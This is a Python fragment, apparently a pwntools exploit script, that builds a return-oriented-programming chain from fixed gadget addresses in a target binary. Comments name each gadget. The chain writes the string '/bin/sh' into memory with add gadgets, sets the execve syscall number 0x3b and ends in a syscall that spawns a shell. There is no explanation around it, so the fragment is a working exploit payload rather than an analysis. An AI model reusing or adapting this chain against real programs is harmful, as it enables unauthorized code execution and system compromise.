payload = p64(0x4056da)
#0x00000000004056da: pop rbx; pop rbp; ret; 
payload += p64(0x6e69622f)+p64(0x4130ad)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4056da)
# 0x00000000004056da: pop rbx; pop rbp; ret; 
payload += p64(0x68662f)+p64(0x4130b1)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4085b5)
# 0x00000000004085b5: pop r12; ret; 
payload += p64(0x4056da)+p64(0x406d6c)
# 0x406d6c: xor edx, edx ; mov rsi, rbx ; mov rdi, rbp ; call r12
payload += b''
# 0x00000000004056da: pop rbx; pop rbp; ret; 
payload += p64(0x0)+p64(0x406746)
# 0x0000000000406746: pop rsi; ret; 
payload += p64(0x405955)+p64(0x4081f3)
# 0x00000000004081f3: mov eax, esi; ret; 
payload += p64(0x407ec6)
# 0x0000000000407ec6: mov edi, dword ptr [rsp + 8]; call rax; 
payload += b''
# 0x0000000000405955: pop rbx; pop rbp; pop r12; pop r13; ret; 
payload += p64(0x0)+p64(0x413070)+p64(0x0)+p64(0x4056da)
# 0x00000000004056da: pop rbx; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x406746)
# 0x0000000000406746: pop rsi; ret; 
payload += p64(0x3b)+p64(0x4081f3)
# 0x00000000004081f3: mov eax, esi; ret; 
payload += p64(0x406746)
# 0x0000000000406746: pop rsi; ret; 
payload += p64(0x0)+p64(0x40ecfe)
# 0x000000000040ecfe: syscall; 
payload += b''
